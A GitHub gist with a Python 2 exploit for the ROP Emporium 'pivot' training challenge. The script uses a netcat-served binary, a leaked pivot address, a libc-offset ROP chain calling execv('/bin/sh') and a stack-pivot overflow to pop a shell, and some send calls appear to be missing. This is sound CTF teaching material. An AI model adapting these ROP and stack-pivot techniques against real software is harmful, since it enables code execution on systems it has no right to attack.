Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Solution for ROP Emporium pivot's challenge (
Solution for ROP Emporium pivot's challenge (
It pops a remote shell.
Run the binary with: nc -lvc ./pivot -p 4444
Then, run this exploit :)
import socket
from struct import pack
import telnetlib
def p64(x):
return pack('<q', x)
s = socket.socket(
socket.AF_INET, socket.SOCK_STREAM)
s.connect(("", 4444))
data = s.recv(1000)
# print data
print "[+] Connected!"
while str.find(data, "to pivot: ") == -1:
data += s.recv(1000)
# print data
pivot = str.find(data, "to pivot: ")
pivot = data[pivot+len("to pivot: "):pivot+len("to pivot: ")+14]
print "[+] Got Pivot: ", pivot
pivot = int(pivot, 16)
command = '/bin/sh\x00'
rop = command
rop += 'C'*8*3 # r13, r14, r15
rop += p64(0x400b00) # pop rax; ret; Set RAX=puts@got
rop += p64(0x602020) # puts@got
rop += p64(0x400900) # pop rbp; ret;
rop += p64(0x5D1D0) # execv-puts offset
rop += p64(0x400b05) # mov rax, qword [rax]; ret; Set RAX=*puts@got (real memory address)
rop += p64(0x400b09) # add rax, rbp; ret; Add offset to calculate the execv position in memory
rop += p64(0x400b73) # pop rdi; ret; prepare arguments for execv: execv(rdi="bin/sh", rsi=0x0=NULL)
rop += p64(pivot) # rdi
rop += p64(0x400b71) # pop rsi; pop r15; ret;
rop += p64(0x0) # rsi
rop += p64(0x0) # r15
rop += p64(0x400943) # jmp rax; Call execv (memory address calculated on RAX)
rop += '\n'
data += s.recv(1000)
print "[+] Pivot ROP sent.."
rop = 'A'*40
rop += p64(0x400b6d) # pop rsp; pop r13; pop r14; pop r15; ret; Create new stack frame on the first buffer (pivot)
rop += p64(pivot+len(command))
rop += 'B'*8
rop += '\n'
print "[+] Overflow ROP sent.."
data += s.recv(1000)
print "[+] Shell popped!"
t = telnetlib.Telnet()
t.sock = s
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.